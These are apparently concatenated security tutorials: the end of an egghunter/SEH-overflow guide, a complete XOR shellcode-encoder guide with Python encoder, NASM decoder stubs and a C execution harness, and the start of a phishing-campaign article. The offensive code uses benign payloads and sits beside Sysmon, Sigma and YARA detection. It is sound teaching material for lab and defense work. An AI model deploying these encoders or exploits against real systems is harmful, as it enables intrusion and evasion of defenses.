    s.sendall(b"KSTET " + trigger + b"\r\n")   # 2) THEN trigger overflow + run hunter

Flow diagram of a staged SEH overflow layout showing padding leading to nSEH short jump, SEH POP-POP-RET gadget, the egghunter in the constrained overflow buffer, and the egg-tagged full payload delivered separately in another request field.
The egg-tagged payload must arrive in a separate request before the overflow trigger is sent; reversing the order leaves the hunter scanning endlessly with nothing to find.

Order matters — payload first, trigger second. Reverse it and you get the 100% CPU loop from section 1.


8. Lab: VulnServer KSTET

VulnServer’s KSTET command is the standard teaching target: its overflow leaves a constrained buffer that naturally forces a staged approach. The workflow:

  1. Attach VulnServer in Immunity Debugger or x64dbg.
  2. Fuzz KSTET, find the offset to SEH control with a cyclic pattern.
  3. Locate a clean POP/POP/RET in a non-/SAFESEH, non-ASLR module.
  4. Generate the hunter with mona: !mona egg -t w00t (add -cpb with your bad-character list, e.g. -cpb "\x00\x0a\x0d", so mona works around those bytes). Mona can emit both SEH-based and NtAccessCheckAndAuditAlarm-based hunters.
  5. Set a breakpoint on the SCASD (\xAF) opcode and single-step to watch EDI march toward the egg — this is the moment that makes the mechanism click.

Read the manual assembly alongside mona’s output. Treat mona as a generator, not a black box. Use a calc.exe/cmd.exe popup as the test payload — never real C2.


9. Detecting Egghunter Behavior

The hunter is loud if you’re listening. Two behavioral tells lead:

  • A single thread pegged at 100%, particularly right after a crash-and-recover on a network service — the symptom of a hunter scanning with no resident payload.
  • NtAccessCheckAndAuditAlarm fired thousands of times in rapid succession, which no legitimate user-mode workload does. It surfaces in ETW syscall traces.
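
The second tell reduces to a per-thread rate check. Below is a minimal Python sketch, assuming syscall events have already been exported from a trace as time-ordered `(timestamp_seconds, thread_id, syscall_name)` tuples; that tuple layout, the function name, and the threshold are all assumptions to tune, not a real ETW schema.

```python
from collections import defaultdict, deque

def burst_threads(events, threshold=1000, window=1.0):
    """Return thread IDs that issue >= threshold probe syscalls within `window` seconds."""
    recent = defaultdict(deque)          # thread id -> timestamps inside the window
    flagged = set()
    for ts, tid, name in events:
        if name != "NtAccessCheckAndAuditAlarm":
            continue
        q = recent[tid]
        q.append(ts)
        while ts - q[0] > window:        # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged.add(tid)
    return flagged

# Synthetic trace: thread 7 hammers the syscall, thread 9 calls it once.
events = [(i * 0.0001, 7, "NtAccessCheckAndAuditAlarm") for i in range(2000)]
events += [(5.0, 9, "NtAccessCheckAndAuditAlarm"), (5.1, 9, "NtReadFile")]
print(burst_threads(events))             # {7}
```
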

| Sysmon Event ID | Name | Relevance |
| --- | --- | --- |
| 1 | Process Creation | Baseline parent-child chain for the vulnerable service |
| 8 | CreateRemoteThread | Egg payload injecting; StartModule/StartFunction empty when the start address is outside loaded modules, a shellcode tell |
| 10 | ProcessAccess | Cross-process handles requesting PROCESS_VM_WRITE (0x0020), PROCESS_VM_OPERATION (0x0008), PROCESS_CREATE_THREAD (0x0002) |
| 25 | ProcessTampering | Sysmon 13+; in-memory image diverging from disk, a hallmark of in-memory execution |

Default SwiftOnSecurity Sysmon config won’t catch CreateRemoteThread injection out of the box because of kernel32.dll exclusions — tune it before you rely on Event ID 8.

title: Remote Thread Start Address Outside Loaded Modules
id: 5a9d3e21-egg0-4c11-9f0a-shellcodeloader   # placeholder; Sigma expects a valid UUIDv4 here
status: experimental
logsource:
  product: windows
  category: create_remote_thread     # Sysmon Event ID 8
detection:
  selection:
    StartModule: ''
    StartFunction: ''
  condition: selection
level: high

Pair that with Microsoft-Windows-Threat-Intelligence ETW (fires on WriteProcessMemory/CreateRemoteThread, needs PPL to consume) and audit policy: auditpol /set /subcategory:"Process Creation" /success:enable yields Security Event 4688. The command line appears in 4688 only when the “Include command line in process creation events” policy is also enabled. And flag INT 0x2E in user mode wherever EDR or ETW lets you; it’s about as high-fidelity as indicators get.

YARA pins the syscall hunter’s opcode signature for memory forensics:

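rule Egghunter_Syscall_x86 {
    meta:
        description = "skape NtAccessCheckAndAuditAlarm egghunter (~32 bytes)"
        author = "GenXCyber"
    strings:
        $page_walk = { 66 81 CA FF 0F }       // or dx, 0x0fff
        $syscall   = { CD 2E }                // int 0x2e
        $av_check  = { 3C 05 }                // cmp al, 0x05
        $scasd     = { AF 75 ?? AF 75 ?? }    // scasd / jnz twice (doubled-tag compare)
    condition:
        // anchor on each page-walk hit; require the rest within the next 32 bytes
        for any i in (1..#page_walk) : (
            $syscall  in (@page_walk[i]..@page_walk[i] + 32) and
            $av_check in (@page_walk[i]..@page_walk[i] + 32) and
            $scasd    in (@page_walk[i]..@page_walk[i] + 32)
        )
}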

10. Tools for Egghunter Analysis

| Tool | Description | Link |
| --- | --- | --- |
| mona.py | Generates/verifies egghunters (!mona egg) in Immunity | corelan.be |
| Immunity Debugger | Classic exploit-dev debugger, mona host | immunityinc.com |
| x64dbg | Free user-mode debugger for stepping the scan | x64dbg.com |
| VulnServer | Safe, intentionally vulnerable practice target | github.com |
| Process Hacker | Spot the 100% CPU thread and handle access | processhacker.sourceforge.io |
| Sysmon | EID 8/10/25 telemetry for shellcode behavior | microsoft.com |
| j00ru syscall table | Authoritative per-OS syscall numbers | j00ru.vexillium.org |
| osed-scripts (epi052) | Egghunter generator and OSED helpers | github.com |

11. Mitigations and Modern Reality

Egghunters were a 32-bit-era staple, and modern defenses have narrowed their utility considerably.

| Mitigation | Effect on the technique |
| --- | --- |
| DEP / NX | Payload on stack/heap won’t execute; primary kill switch for legacy targets |
| ASLR | Hardcoded POP/POP/RET addresses break; forces wider scans → more CPU and ETW noise |
| Control Flow Guard | Validates indirect call targets in CFG-instrumented code, so it can block a hijacked indirect call that would start the hunter; the hunter’s own JMP EDI is uninstrumented shellcode and is not checked |
| GS / stack canaries | Don’t stop the hunter, but can stop the overflow that delivers it |
| App sandboxing | Limits post-execution blast radius |

The technique still earns its place in OSED-style coursework and against unhardened legacy 32-bit software — which is exactly where you find it in real engagements.


12. MITRE ATT&CK Mapping

Egghunters are delivery scaffolding, not a post-exploitation tactic. There’s no ATT&CK sub-technique for “egghunter,” and you shouldn’t invent one. It sits upstream of the payload, in the exploitation-and-loading layer. Map the surrounding behavior:

| Technique | MITRE ID | Detection |
| --- | --- | --- |
| Exploitation for Client Execution | T1203 | Service crash/recover, EID 1 anomalies |
| Process Injection | T1055 | Sysmon EID 8/10, TI ETW |
| Process Injection: DLL Injection | T1055.001 | EID 8 with empty StartModule |
| Reflective Code Loading | T1620 | In-memory PE, EID 25 ProcessTampering |
| Obfuscated Files or Information | T1027 | Encoded egg payload, YARA on decoder stubs |
| Sandbox Evasion: Time Based | T1497.003 | CPU-spike artifact in sandboxes |

Summary

  • An egghunter is a ~32-byte stage-1 stub that scans process memory for a doubled tag and jumps to the stage-2 payload — the answer to “my buffer is too small for real shellcode.”
  • The hunter walks memory page-by-page (OR DX, 0x0FFF), validates each page via NtAccessCheckAndAuditAlarm/INT 0x2E (or an SEH frame), and confirms the egg with two consecutive SCASD instructions before JMP EDI.
  • The payload must already be resident when the hunter runs; otherwise it loops and pegs a CPU core — a behavioral indicator in its own right.
  • Syscall numbers are OS-version specific (verify against j00ru) and WoW64 needs Heaven’s Gate, so portability is the real-world friction.
  • Detect it via the INT 0x2E anomaly, rapid NtAccessCheckAndAuditAlarm bursts, Sysmon EID 8 threads with empty StartModule, EID 25 tampering, and a YARA signature on the canonical opcode window — and mitigate upstream with DEP, ASLR, and CFG.

Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars

You found the overflow. You control EIP. Your execve("/bin/sh") payload runs perfectly in the debugger — and then dies the moment it crosses the wire. Nine times out of ten the culprit is a single byte the transport or a string routine refused to carry intact. A \x00 that strcpy treated as end-of-string. A \x0a the protocol parser read as newline. The fix isn’t a better payload; it’s an encoder that launders the offending bytes out, plus a tiny decoder that rebuilds the original at runtime.

This walks through XOR encoding end to end — the byte math, a Python encoder, a position-independent decoder stub in x86 NASM, a per-chunk keyed variant, stack-based decoding, and what shikata_ga_nai adds on top. Every stub here decodes a benign exit(0) payload. The point is to understand the mechanism well enough to detect and defend against it, so the final third is all blue team.


1. Why Shellcode Breaks: Bad Characters

A bad character is any byte value the delivery path mangles, truncates, or drops before your shellcode lands in executable memory intact. The constraint comes from the vulnerability, not from the payload.

| Byte | Name | Why it breaks things |
| --- | --- | --- |
| \x00 | NULL | Terminates C strings; strcpy/sprintf stop copying here |
| \x0a | Line Feed | Read as end-of-input by line-oriented protocols and by gets() |
| \x0d | Carriage Return | Paired with \x0a in HTTP/SMTP headers; often stripped |
| \x20 | Space | Token delimiter in many parsers |
| \xff | 0xFF | Sentinel / length markers in some binary protocols |

The list is per target. A web exploit might tolerate \x00 (the buffer isn’t a C string) but choke on \x26 (&) because of URL parsing. You don’t guess — you measure (Section 3).


2. The XOR Contract

XOR is the canonical encoding operation for one reason: it’s its own inverse. XOR a byte with a key, XOR the result with the same key, and you’re back where you started.

A ⊕ K ⊕ K = A

| A | K | A ⊕ K |
| --- | --- | --- |
| 0 | 0 | 0 |
| 0 | 1 | 1 |
| 1 | 0 | 1 |
| 1 | 1 | 0 |

There’s no key schedule, no S-box, no state to carry, which matters because every byte of decoder stub is a byte that isn’t shellcode. A single-byte XOR decoder fits in roughly 20 bytes (the JMP-CALL-POP stub in Section 5 is exactly 20). That economy is exactly why it shows up in real tooling and why analysts learn to recognize its shape on sight.

The encoder’s job is to pick a key K such that original_byte ⊕ K is never a bad character — for every byte in the payload. If a candidate key produces even one collision, throw it away and try the next. And if the encoded output ever lands on \x00, that’s a bad char too; re-key.
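
Both halves of the contract, the round trip and the zero-byte collision, fit in a few lines of Python. The key and the four payload bytes here are chosen only to make the collision visible; `xor_bytes` is an illustrative helper.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR key; the same call both encodes and decodes."""
    return bytes(b ^ key for b in data)

payload = bytes([0x31, 0xC0, 0xB0, 0x01])
key = 0xB0                               # deliberately equal to one payload byte

encoded = xor_bytes(payload, key)
assert xor_bytes(encoded, key) == payload   # XOR is its own inverse
print(encoded.hex())                     # 817000b1 -> the 0xB0 byte became 0x00
```

Any payload byte equal to the key encodes to \x00, which is why a key search has to test every byte of the payload rather than just the key value itself.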


Flow diagram showing shellcode going through key search and XOR encoding, crossing a hostile transport layer, then being decoded by the stub and executed on the target
XOR encoding and decoding are symmetric operations — the same key byte transforms the payload in both directions, so only a tiny stub is needed at runtime.

3. Finding the Bad Chars

Before you encode anything, you enumerate what to avoid. The workflow is mechanical:

  1. Build a test pattern of all 256 byte values, \x00 through \xff, minus any you already know are bad.
  2. Drop it into the vulnerable buffer and dump the buffer from memory.
  3. Diff the dump against what you sent. The first byte that’s wrong (mangled, missing, or where the copy stopped) is a bad char.
  4. Add it to the list, regenerate the pattern without it, repeat until the whole pattern survives byte-for-byte.

A small diff helper makes step 3 fast:

#!/usr/bin/env python3
# Bad-char scanner: compare what you sent vs. what landed in memory.
def first_bad(expected: bytes, received: bytes):
    for i, (e, r) in enumerate(zip(expected, received)):
        if e != r:
            return i, hex(e), hex(r)          # index, sent, received
    if len(expected) != len(received):
        return min(len(expected), len(received)), "(truncated)", None
    return None

# expected = bytes(range(0x01, 0x100))        # full pattern minus \x00
# received = open("dump.bin","rb").read()
# print(first_bad(expected, received))

Truncation tells you something extra: the first byte that failed to arrive, the one at the index where the copy stopped, is usually the terminator. Note it, exclude it, run again.
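
Steps 1 and 4 of the workflow, building the pattern and rebuilding it without each newly found bad byte, can be sketched as a one-line generator. `build_pattern` is a hypothetical helper name, and the default exclusion of \x00 is an assumption that suits string-based bugs.

```python
def build_pattern(known_bad=frozenset({0x00})) -> bytes:
    """All byte values 0x00..0xFF in order, minus those already known to be bad."""
    return bytes(b for b in range(256) if b not in known_bad)

known_bad = {0x00}
pattern = build_pattern(known_bad)       # first pass: 255 bytes
known_bad.add(0x0A)                      # suppose the diff showed \x0a was mangled
pattern = build_pattern(known_bad)       # second pass: 254 bytes, no \x0a
print(len(pattern))                      # 254
```
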


4. Building an XOR Encoder in Python

The encoder ingests raw shellcode and the confirmed bad-char set, searches for a clean single-byte key, and emits the encoded blob.

#!/usr/bin/env python3
# XOR shellcode encoder — teaching / authorized-lab use only.

# Benign x86 stub: exit(0)  (xor eax,eax; mov al,1; xor ebx,ebx; int 0x80)
shellcode = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])
bad_chars = {0x00, 0x0a, 0x0d}

def find_key(sc, bad):
    for key in range(1, 256):
        if key in bad:
            continue
        if all((b ^ key) not in bad for b in sc):   # no encoded byte is bad
            return key
    return None

key = find_key(shellcode, bad_chars)
if key is None:
    raise SystemExit("[-] No single-byte key is clean. Use per-chunk keying.")

encoded = bytes(b ^ key for b in shellcode)
print(f"[+] key   = {hex(key)}")
print(f"[+] length = {len(encoded)}")
print("[+] blob  = " + "".join(f"\\x{b:02x}" for b in encoded))

If find_key returns None, no single byte can XOR the whole payload clean — you’ve over-constrained the key space. That’s the cue to move to a per-chunk scheme (Section 7), where each chunk gets its own key.


5. The Decoder Stub in x86 (NASM)

The stub runs first on the target, decodes the bytes that follow it, and jumps into them. The hard part is position independence: the stub doesn’t know its own load address, so it can’t hardcode a pointer to the encoded blob. The classic answer is JMP-CALL-POP — a forward jmp short to a call that points backward, so the call pushes the address of the bytes immediately after it. pop that return address and you’ve located your payload at runtime.

section .text
global _start

_start:
    jmp short get_payload      ; (1) hop over the decoder to the CALL

decoder:
    pop  esi                   ; (3) ESI -> first encoded byte
    xor  ecx, ecx
    mov  cl, payload_len       ; loop counter = payload length
decode_loop:
    xor  byte [esi], 0xAA      ; (4) decode one byte, key = 0xAA
    inc  esi                   ; advance
    loop decode_loop           ; ECX--, repeat while non-zero
    jmp  payload               ; (5) run the now-decoded shellcode

get_payload:
    call decoder               ; (2) pushes addr of `payload`, jumps back

payload:
    db   0xcc, 0xcc, 0xcc      ; <-- splice encoder output here
payload_len equ $ - payload

jmp payload assembles to a relative offset, so it stays position-independent without touching ESI. The loop instruction (0xE2) decrements ECX and branches while non-zero.

Here’s the gotcha that cost me an afternoon once: CL is eight bits. mov cl, payload_len keeps only the low byte of anything over 255 (NASM warns but still assembles), so a 300-byte payload decodes only its first 44 bytes and then jumps into still-encoded garbage. The crash makes no sense until you check ECX. For longer payloads, widen the counter: after xor ecx, ecx, mov cx, payload_len covers up to 65,535 bytes, whereas a full mov ecx, payload_len needs no prior clearing but pads small lengths with \x00 bytes in its 32-bit immediate.
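
The truncation is plain modular arithmetic, and it has a nastier edge case at exact multiples of 256. The Python sketch below models the counter the stub actually ends up with; `loop_iterations` is an illustrative name.

```python
def loop_iterations(payload_len: int) -> int:
    """Iterations of `loop` after `xor ecx, ecx` / `mov cl, payload_len`."""
    ecx = payload_len & 0xFF             # mov cl, imm8 keeps only the low byte
    # `loop` decrements before testing, so ECX = 0 wraps and runs 2**32 times.
    return ecx if ecx else 2**32

for n in (8, 300, 256):
    print(n, loop_iterations(n))
```

A 300-byte payload gets 44 iterations, as described above; a 256-byte payload loads zero into CL and the loop runs off the end of the buffer instead of stopping early.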

Build and extract:

nasm -f elf32 stub.asm -o stub.o
ld   -m elf_i386 stub.o -o stub
objdump -d stub                              # eyeball the opcodes
objcopy -O binary --only-section=.text stub stub.bin
xxd -i stub.bin                              # emit a C array of the bytes

To confirm the assembled stub plus spliced payload actually executes, test it in a throwaway VM — never on your host, never networked:

/* LAB ONLY — disposable VM, no network.
   gcc -m32 -z execstack -fno-stack-protector test.c -o test */

#include <stdio.h>
unsigned char buf[] =
    "\xeb\x0d\x5e\x31\xc9\xb1\x08\x80\x36\xaa\x46\xe2\xfa\xeb\x05"
    "\xe8\xee\xff\xff\xff" /* + encoded payload bytes */;
int main(void) {
    printf("stub length: %zu\n", sizeof(buf) - 1);
    ((void(*)())buf)();
    return 0;
}

Flow diagram of the JMP-CALL-POP technique showing how a forward JMP reaches a CALL that pushes the payload address, POP captures it into ESI, and the decode loop XORs each byte before jumping into the now-decoded shellcode
JMP-CALL-POP gives the decoder stub a runtime pointer to the encoded payload without any hardcoded addresses, making it fully position-independent.

6. The Stub Must Be Clean Too

This is the mistake nearly every student makes: they encode the payload until it’s spotless, splice it in, and the exploit still dies — because the decoder stub’s own opcodes contain a bad char. The transport doesn’t care which bytes are “payload” and which are “decoder.” Every byte in the buffer has to survive.

So audit the stub bytes the same way you audit everything else:

#!/usr/bin/env python3
# Flag any decoder-stub byte that collides with the bad-char set.
from capstone import Cs, CS_ARCH_X86, CS_MODE_32

def audit_stub(stub: bytes, bad: set):
    md = Cs(CS_ARCH_X86, CS_MODE_32)
    for ins in md.disasm(stub, 0x0):
        raw = stub[ins.address:ins.address + ins.size]
        hits = [hex(b) for b in raw if b in bad]
        tag = f"   <-- BAD {hits}" if hits else ""
        print(f"{ins.address:04x}  {ins.mnemonic:6} {ins.op_str}{tag}")

When a hit shows up, rewrite the instruction to a semantically equal one with different opcodes. The textbook example: xor eax, eax assembles to \x31\xc0. If \x31 is bad, swap in sub eax, eax (\x29\xc0), which zeroes the register just as well. The same trick rescues xor ecx, ecx (\x31\xc9 → sub ecx, ecx = \x29\xc9). Keep a mental table of these substitutions; you’ll lean on it constantly.


7. Per-Chunk Keyed Encoding

When the bad-char set is large enough that no single key clears the whole payload, split the work. Break the shellcode into N-byte chunks; for each chunk, search for a byte that XORs that chunk clean, then prepend the chosen key byte to the chunk. The decoder reads the key, applies it to the following N bytes, advances, and repeats.

; Per-chunk keyed decoder. Layout: [key][d0][d1] [key][d0][d1] ... [marker]
decode_chunk:
    mov   al, [esi]            ; AL = key for this chunk
    inc   esi                  ; ESI -> first data byte
    xor   byte [esi], al       ; decode data byte 0
    inc   esi
    xor   byte [esi], al       ; decode data byte 1
    inc   esi
    cmp   byte [esi], 0x90     ; end-marker (raw, unencoded NOP)?
    jne   decode_chunk
    jmp   payload_start        ; first decoded byte

Scheme | Pro | Con
Fixed single key | Smallest stub; one xor per byte | Fails when bad-char set is dense
Per-chunk key | Survives tight bad-char sets | Larger blob (one key byte per chunk); bigger stub

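The end-marker matters here: a fixed length is brittle, so a sentinel lets the decoder run until it sees the marker instead of carrying a hardcoded count. Pick a marker value that can’t appear as a chunk key or you’ll halt early. If 0x90 is a plausible key, use a distinctive two-byte sentinel instead. One caveat on the listing: decoding in place leaves every key byte sitting between the decoded chunks, so the buffer is not yet contiguous code. The listing shows the decode loop only; the decoded bytes still have to be compacted, or written to a separate destination as in Section 8, before control transfers to them.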
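From the analyst's side, the same layout is straightforward to unpack when you pull a blob like this out of a memory dump. This is a minimal sketch that assumes the [key][d0][d1] ... [marker] layout from the listing; the function name, the sample bytes, and the defaults are hypothetical.

```python
def decode_chunked(blob: bytes, chunk_size: int = 2, marker: int = 0x90) -> bytes:
    """Recover the original bytes from a [key][data...] ... [marker] layout."""
    out = bytearray()
    i = 0
    # Stop at the raw marker, which sits where the next key byte would be.
    while i < len(blob) and blob[i] != marker:
        key = blob[i]
        data = blob[i + 1 : i + 1 + chunk_size]
        if len(data) < chunk_size:
            raise ValueError("truncated chunk before end-marker")
        out.extend(b ^ key for b in data)
        i += 1 + chunk_size
    return bytes(out)


# Hypothetical sample: two chunks keyed 0x11 and 0x22, then the 0x90 marker.
sample = bytes([0x11, 0x41 ^ 0x11, 0x42 ^ 0x11,
                0x22, 0x43 ^ 0x22, 0x44 ^ 0x22,
                0x90])
print(decode_chunked(sample))
```

Note that the output here is contiguous because the key bytes are dropped while copying, which is also why a key equal to the marker value would end the loop early.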


8. Stack-Based Decoding

In-place decoding writes over the encoded blob where it sits. Sometimes you’d rather leave the original untouched and decode into fresh stack space — useful when the landing buffer is read-only or you want the executable copy somewhere predictable.

decoder:
    pop   esi                  ; ESI -> encoded payload
    sub   esp, 0x200           ; reserve 512 bytes of scratch
    mov   edi, esp             ; EDI -> destination buffer
    xor   edx, edx             ; offset = 0
copy_decode:
    mov   al, [esi + edx]      ; fetch encoded byte
    cmp   al, 0xcc             ; raw end-marker?
    je    run
    xor   al, 0xaa             ; decode with key
    mov   [edi + edx], al      ; write to stack
    inc   edx
    jmp   copy_decode
run:
    jmp   edi                  ; execute decoded shellcode on the stack

EDX tracks the running offset into both source and destination; the marker is checked before decoding so it stays a literal sentinel. The catch: sub esp must reserve enough room, and the marker can’t collide with an encoded byte. This pattern is also the one DEP/NX and Arbitrary Code Guard hit hardest — you’re executing freshly written stack memory, which is exactly what those mitigations exist to stop (Section 10).


9. shikata_ga_nai: the State of the Art

The single-byte XOR loop is trivially signatured — that tight xor / inc / loop sequence is a detection rule. Metasploit’s shikata_ga_nai answers with a polymorphic XOR additive feedback encoder. Two ideas carry it:

  • Chained, self-modifying key. Each decoded byte feeds into the key used for the next. Get one byte or the initial key wrong and the whole tail decodes to noise — which also frustrates partial emulation.
  • Metamorphic stub generation. The decoder is rebuilt with reordered and substituted instructions every time, so two payloads from the same source share no static signature. Its GetPC routine is deliberately obfuscated, using FPU instructions like fnstenv [esp-0xc] to recover EIP without a tell-tale CALL, which also trips up emulators that don’t model the FPU.

You don’t need to build one to defend against it. The lesson for blue teams is the opposite: stop chasing the encoded bytes and watch the behavior, because the bytes are designed to be different every time and the behavior isn’t.


10. Detection and Defense: What the Blue Team Sees

The encoded payload is, by construction, a poor signature target. The decoder’s behavior is not. Two heuristics catch nearly every variant: self-modifying memory (a region writes to itself, then executes), and execution from writable memory (RWX stack/heap pages, VirtualAlloc(PAGE_EXECUTE_READWRITE)).

Behavior | What it reveals
Tight xor/inc/loop over a code region | Classic fixed-key decoder stub
Region transitions writable → executable | Decoded payload about to run
Execution from unbacked memory | Code with no file on disk behind it
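To make the two heuristics concrete, here is a small sketch of how a scanner might label a snapshot of memory regions. The Region type, its simplified protection strings, and the sample values are all assumptions for illustration; real tools such as pe-sieve or Moneta work from the OS memory map and do far more.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Region:
    base: int
    protection: str              # simplified flags such as "RW", "RX", "RWX"
    backing_file: Optional[str]  # None: no file on disk maps this region


def findings(region: Region) -> List[str]:
    """Return the behavioral flags that apply to one memory region."""
    out = []
    executable = "X" in region.protection
    if executable and "W" in region.protection:
        out.append("writable and executable")
    if executable and region.backing_file is None:
        out.append("executable but unbacked")
    return out


# Hypothetical snapshot of three regions.
regions = [
    Region(0x00400000, "RX", "C:\\app\\app.exe"),
    Region(0x02A00000, "RWX", None),
    Region(0x02B00000, "RW", None),
]
for r in regions:
    print(hex(r.base), findings(r) or "ok")
```

A snapshot only catches regions that are still RWX or unbacked at scan time; catching the writable-to-executable transition itself needs event telemetry rather than a point-in-time scan.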

Sysmon Event IDs

Event ID | Name | Relevance
1 | Process Creation | Loader/injector process spawn
7 | Image Loaded | DLLs from temp/download paths into system processes
8 | CreateRemoteThread | Thread created in another process; low-volume, high-signal
10 | ProcessAccess | Cross-process memory access; inspect GrantedAccess and CallTrace
25 | ProcessTampering | In-memory image diverges from disk (hollowing / in-memory decode)

Configuration is where visibility quietly dies. The SwiftOnSecurity sysmon-config excludes kernel32.dll as a StartModule, which silently suppresses Event ID 8 for injections that go through LoadLibraryW. Remove that StartModule exclusion to restore coverage.

Sigma Rule

title: Shellcode Injection via Suspicious Cross-Process Access
logsource:
  product: windows
  category: process_access
detection:
  selection:
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
level: high
tags:
  - attack.t1055

A CallTrace of UNKNOWN means the access originated from unbacked memory — no module owns those instructions, which is exactly the fingerprint a decoded payload leaves.
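If you want to sanity-check the rule's logic against exported events before deploying it, the selection reduces to two conditions. The sketch below is not a Sigma engine; it assumes events arrive as plain dicts keyed by Sysmon field names, and the sample events are invented.

```python
SUSPICIOUS_ACCESS = {"0x147a", "0x1f3fff"}


def matches_rule(event: dict) -> bool:
    """Mirror the rule's selection: listed GrantedAccess AND UNKNOWN in CallTrace."""
    # Compare case-insensitively so hex digits match regardless of letter case.
    access = str(event.get("GrantedAccess", "")).lower()
    trace = str(event.get("CallTrace", "")).lower()
    return access in SUSPICIOUS_ACCESS and "unknown" in trace


# Hypothetical Event ID 10 records.
events = [
    {"GrantedAccess": "0x1F3FFF",
     "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4|UNKNOWN(000001F2A3B40000)"},
    {"GrantedAccess": "0x1000",
     "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4|C:\\Windows\\System32\\KERNELBASE.dll+2c13e"},
]
for e in events:
    print(e["GrantedAccess"], matches_rule(e))
```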

ETW providers

Provider | Purpose
Microsoft-Windows-Threat-Intelligence | Kernel-level VirtualAlloc/VirtualProtect/WriteProcessMemory/CreateRemoteThread; consumed by PPL EDRs
Microsoft-Windows-Security-Auditing | Event ID 4688 process creation with command line
AMSI | Inspects script content after deobfuscation, before execution

Hardening

  • bcdedit /set nx AlwaysOn — system-wide DEP/NX blocks execution of decoded stack/heap output.
  • Arbitrary Code Guard (ACG) via ProcessDynamicCodePolicy — forbids self-modifying and dynamically generated code, which directly kills in-place XOR decode.
  • Code Integrity Guard (CIG) via ProcessSignaturePolicy — blocks unsigned image loads.
  • Watch for AmsiScanBuffer patching, the standard AMSI bypass; pair AMSI with constrained language mode and allowlisting.
  • Scan for RWX and unbacked regions with pe-sieve, Moneta, or Hunt-Sleeping-Beacons — the residue a decoded payload leaves behind.

Hierarchy diagram showing behavioral indicators branching into RWX self-modifying memory and unbacked execution, each feeding into corresponding telemetry sources and hardening controls
Defenders shift focus from ever-changing encoded bytes to stable behavioral signals — self-modifying memory and unbacked execution are the constants that encoding cannot hide.

11. Tools

Tool | Description | Link
NASM | Assemble x86/x64 decoder stubs | nasm.us
GDB + pwndbg | Single-step the decode loop, inspect ESI/ECX | gdb.gnu.org
objdump / objcopy | Disassemble stubs, extract .text bytes | gnu.org
Capstone | Programmatic opcode audit for bad chars | capstone-engine.org
pwntools | Encoder/exploit automation (pwnlib.encoders) | docs.pwntools.com
pe-sieve / Moneta | Scan live processes for RWX / unbacked memory | github.com
Sysmon | Endpoint telemetry for Event IDs 8, 10, 25 | learn.microsoft.com

12. MITRE ATT&CK Mapping

Technique | MITRE ID | Detection
Obfuscated Files or Information | T1027 | Entropy/structure anomalies; encoded blob with decoder prefix
Encrypted/Encoded File | T1027.013 | Static scan for XOR-loop stub patterns near high-entropy data
Deobfuscate/Decode Files or Information | T1140 | Self-modifying memory; ACG violations; ETW VirtualProtect
Process Injection | T1055 | Sysmon 8/10; Sigma on GrantedAccess + CallTrace: UNKNOWN
PE Injection | T1055.002 | Shellcode written into another process; RWX region creation
Reflective Code Loading | T1620 | Execution from unbacked memory; pe-sieve / Moneta

Summary

  • XOR encoding survives bad-char-hostile delivery paths because XOR is self-inverse — encode once, decode at runtime with the same key.
  • The decoder stub uses JMP-CALL-POP to find itself in memory, then loops xor byte [esi], key over the encoded payload and jumps in; a CL loop counter silently caps you at 255 bytes.
  • The stub’s own opcodes must be bad-char-clean too — audit them with Capstone and substitute equivalent instructions (sub eax,eax for xor eax,eax).
  • Per-chunk keys and stack-based decode handle dense bad-char sets and read-only buffers; shikata_ga_nai adds polymorphism so the encoded bytes never signature the same way twice.
  • Defenders ignore the shifting bytes and hunt the behavior — self-modifying RWX memory, CallTrace: UNKNOWN on Sysmon Event ID 10, and ACG/DEP violations on execution.

Phishing Campaign Design: Pretexting, Lures, and Target Profiling

The most common mistake I see from someone running their first authorized phishing engagement is treating it as an email problem. They obsess over the payload and the landing page, launch on day two, and wonder why the click rate is 4%. The professional sequence is inverted — the message is the last artifact you build. The dossier, the pretext, and the sender domain’s reputation decide whether anyone reads past the subject line. Everything else is decoration.

This walkthrough is written for authorized red teamers and the defenders who have to understand the adversary’s decision chain to break it. Every phase maps to MITRE ATT&CK, and every offensive step is paired with how a blue team sees it.


1. Rules of Engagement and Legal Scope

Phishing simulations touch real people and harvest real PII. None of what follows is legal without explicit, signed authorization. Before a single byte of recon:

  • Written authorization naming the target organization, the engagement window, and the specific techniques in scope (attachment vs. link vs. vishing).
  • A scoping statement that lists which domains, mailboxes, and employee groups are fair game — and which are explicitly off-limits (legal, HR, executives’ personal accounts).
  • Data-handling rules. Harvested credentials, breach-dump matches, and scraped employee data are PII. Encrypt at rest, define a retention window, and destroy on engagement close. You are a custodian, not a collector.
  • An abort and de-confliction path so the SOC’s incident response doesn’t burn a weekend chasing your simulation.

If you can’t point to the paragraph in the contract that authorizes a technique, you don’t run it.


2. The Adversary’s Pre-Attack Workflow

Real intrusion sets — APT29, Kimsuky, TA453 — don’t improvise lures. They build a target list first, under the Reconnaissance tactic (TA0043), long before any email leaves an outbox. The workflow is iterative: start with a broad pool of harvested identities, enrich each with org and role context, then narrow to a short list of high-value recipients whose job function makes a specific pretext plausible.

The reason this matters to defenders: most of this generates zero target-side telemetry. Passive identity collection (T1589) reads breach databases and LinkedIn; nothing hits your logs. Your first detectable event is often the inbound message itself — which means the controls that matter most are the ones that limit exposure before the campaign and inspect delivery during it.


Flow diagram showing the adversary pre-attack workflow from identity harvesting through org enrichment, target ranking, pretext building, delivery, and credential harvesting with MITRE ATT&CK technique labels on each step
Real threat actors build the dossier long before composing a message — nearly every stage up to delivery generates zero target-side telemetry.

3. Target Profiling via OSINT

Passive vs. Active Reconnaissance

Passive recon never touches the target’s infrastructure — breach dumps, social media, cached pages. Active recon (port scans, mail-server probing) does, and it’s noisier. A good profiling phase stays passive as long as possible.

The ATT&CK techniques in play:

Technique | MITRE ID | What it feeds
Gather Victim Identity Information | T1589 | Names, emails, exposed credentials
Email Addresses | T1589.002 | Format enumeration (first.last@)
Employee Names | T1589.003 | Org-chart and LinkedIn scraping
Gather Victim Org Information | T1591 | Departments, hierarchy
